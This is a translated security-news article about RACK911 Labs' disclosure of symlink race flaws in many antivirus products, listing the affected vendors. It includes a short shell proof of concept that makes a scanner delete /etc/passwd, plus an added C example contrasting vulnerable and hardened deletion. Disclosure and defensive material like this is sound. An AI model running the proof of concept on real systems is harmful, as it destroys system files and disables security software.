Many antivirus products can easily be attacked through symbolic links

Researchers from RACK911 Labs have drawn attention to the fact that almost all antivirus packages for Windows, Linux and macOS were vulnerable to race-condition attacks during the deletion of files in which malware had been detected.

To carry out the attack, one places a file that the antivirus recognises as malicious (a test signature can be used, for example) and then, after the antivirus has detected the malicious file but immediately before it calls the function that deletes it, replaces the directory containing the file with a symbolic link. On Windows the same effect is achieved by swapping the directory for a directory junction. The problem is that almost none of the antivirus products checked symbolic links correctly: believing they were deleting the malicious file, they deleted the file of the same name in the directory the symbolic link pointed to.

On Linux and macOS it is demonstrated how, in this way, an unprivileged user can delete /etc/passwd or any other system file, and on Windows the antivirus's own DLL, disrupting its operation (on Windows the attack is limited to deleting files that are not currently in use by other applications). For example, an attacker can create an "exploit" directory, place in it a file named EpSecApiLib.dll containing the test virus signature, and then, before the file is deleted, replace the "exploit" directory with a link to "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform", which causes the EpSecApiLib.dll library to be removed from the antivirus's own directory. On Linux and macOS the same trick is performed by replacing the directory with a symbolic link to "/etc".

#!/bin/sh
# Proof of concept from RACK911 Labs as reproduced in the article: plant a file the
# scanner will flag, then swap its parent directory for a symlink to /etc at the
# moment the scanner opens the file, so the scanner's delete call lands on /etc/passwd.
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
# The EICAR test file is detected by every scanner and stands in for real malware;
# it is saved under the name of the system file the scanner is meant to delete.
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
# inotifywait reports the scanner opening the file; after the fifth OPEN event
# grep exits successfully and the loop body performs the swap.
while inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
    rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
done


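The scanner-side half of the race, as an added example that is not RACK911 Labs' code or from the article: the vulnerable path-based unlink() the article describes, beside a hardened deletion that pins the parent directory to a descriptor, refuses it if it has become a symbolic link, and confirms the entry is still the same regular file (device and inode) that was detected before calling unlinkat(). run_scenario() rebuilds the article's layout (exploit/passwd as the flagged file, etc/passwd as the victim) in a scratch directory under /tmp and performs the directory swap deterministically instead of racing a real scanner. All function names, paths and file contents below are constructed for this example; no real test signature is written to disk.

```c
/* Added example (not RACK911 Labs' code, not from the article): the scanner-side
 * deletion step, first as the vulnerable path-based unlink() the article
 * describes, then hardened so that a directory swapped for a symlink between
 * detection and deletion is refused. run_scenario() rebuilds the article's
 * layout (exploit/passwd as the flagged file, etc/passwd as the victim) in a
 * scratch directory and performs the swap deterministically instead of racing.
 * All names, paths and file contents below are constructed for this example. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Identity of the file at detection time; a path alone is not an identity. */
struct scanned_file { dev_t dev; ino_t ino; };

static int record_identity(const char *path, struct scanned_file *out)
{
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode)) return -1;
    out->dev = st.st_dev;
    out->ino = st.st_ino;
    return 0;
}

/* VULNERABLE: re-resolves the whole path at deletion time, so the unlink lands
 * wherever the (possibly swapped) path components now point. */
static int naive_remove(const char *path) { return unlink(path); }

/* HARDENED: pin the parent directory to a descriptor, refuse it if it has
 * become a symlink, confirm the entry is still the same regular file that was
 * detected, and unlink relative to the pinned directory. An attacker who can
 * still rename entries inside that directory can only make us delete another
 * file of theirs in it, never a file outside it. */
static int safe_remove(const char *dir, const char *name, const struct scanned_file *id)
{
    if (strchr(name, '/') != NULL) return -1;       /* single path component only */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0) return -1;                         /* ELOOP if dir is now a symlink */
    struct stat st;
    int ok = fstatat(dfd, name, &st, AT_SYMLINK_NOFOLLOW) == 0 &&
             S_ISREG(st.st_mode) && st.st_dev == id->dev && st.st_ino == id->ino;
    int rc = ok ? unlinkat(dfd, name, 0) : -1;
    close(dfd);
    return rc;
}

static int write_file(const char *path, const char *content)
{
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs(content, f);
    return fclose(f);
}

/* Returns 1 if the victim survived the deletion step, 0 if it was deleted,
 * -1 if the scratch tree could not be built. */
static int run_scenario(int hardened)
{
    char base[] = "/tmp/avrace.XXXXXX";
    if (mkdtemp(base) == NULL) return -1;
    char exploit_dir[PATH_MAX], flagged[PATH_MAX], etc_dir[PATH_MAX], victim[PATH_MAX];
    snprintf(exploit_dir, sizeof exploit_dir, "%s/exploit", base);
    snprintf(flagged, sizeof flagged, "%s/exploit/passwd", base);
    snprintf(etc_dir, sizeof etc_dir, "%s/etc", base);
    snprintf(victim, sizeof victim, "%s/etc/passwd", base);
    if (mkdir(exploit_dir, 0700) != 0 || mkdir(etc_dir, 0700) != 0) return -1;
    /* Constructed contents: a stand-in for the flagged file (no real test
     * signature is written) and a stand-in for the system file. */
    if (write_file(flagged, "constructed: file the scanner flags\n") != 0) return -1;
    if (write_file(victim, "constructed: system file the attacker wants gone\n") != 0) return -1;

    struct scanned_file id;                         /* 1. detection */
    if (record_identity(flagged, &id) != 0) return -1;

    /* 2. attacker wins the race: exploit/ is replaced by a symlink to etc/ */
    if (unlink(flagged) != 0 || rmdir(exploit_dir) != 0 || symlink(etc_dir, exploit_dir) != 0)
        return -1;

    if (hardened) safe_remove(exploit_dir, "passwd", &id);   /* 3. deletion */
    else          naive_remove(flagged);

    int survived = access(victim, F_OK) == 0;
    unlink(victim); unlink(exploit_dir); rmdir(etc_dir); rmdir(base);
    return survived;
}

int main(void)
{
    printf("path-based unlink():  victim %s\n", run_scenario(0) == 1 ? "survived" : "deleted");
    printf("pinned unlinkat():    victim %s\n", run_scenario(1) == 1 ? "survived" : "deleted");
    return 0;
}
```

O_NOFOLLOW only guards the final component of the directory path; if intermediate components are also attacker-writable, walk the path one component at a time with openat(..., O_DIRECTORY | O_NOFOLLOW) from a trusted root, or on Linux 5.6 and later use openat2() with RESOLVE_NO_SYMLINKS. The Windows junction case is analogous: the parent must be checked for a reparse point (FILE_ATTRIBUTE_REPARSE_POINT) and the file deleted by handle rather than by re-resolving a path.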
In addition, many antivirus programs for Linux and macOS were found to use predictable file names when working with temporary files in the /tmp and /private/tmp directories, which could be exploited to escalate privileges to the root user.

By now the problems have been fixed by most vendors, but it is notable that the first notifications about the problem were sent to the manufacturers in the autumn of 2018. Although not all vendors have released updates, they were given at least six months to fix the issue, and RACK911 Labs considers itself free to disclose the vulnerabilities now. RACK911 Labs notes that it has been identifying vulnerabilities for a long time, but did not expect it to be so difficult to work with colleagues in the antivirus industry, because of delays in releasing updates and disregard for the need to fix security problems urgently.

Affected products (the free ClamAV antivirus package is not on the list):

  • Linux
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • Eset File Server Security
    • F-Secure Linux Security
    • Kaspersky Endpoint Security
    • McAfee Endpoint Security
    • Sophos Anti-Virus for Linux
  • Windows
    • Avast Free Anti-Virus
    • Avira Free Anti-Virus
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • F-Secure Computer Protection
    • FireEye Endpoint Security
    • Intercept X (Sophos)
    • Kaspersky Endpoint Security
    • Malwarebytes for Windows
    • McAfee Endpoint Security
    • Panda Dome
    • Webroot Secure Anywhere
  • macOS
    • AVG
    • BitDefender Total Security
    • Eset Cyber Security
    • Kaspersky Internet Security
    • McAfee Total Protection
    • Microsoft Defender (BETA)
    • Norton Security
    • Sophos Home
    • Webroot Secure Anywhere

    Source: opennet.ru
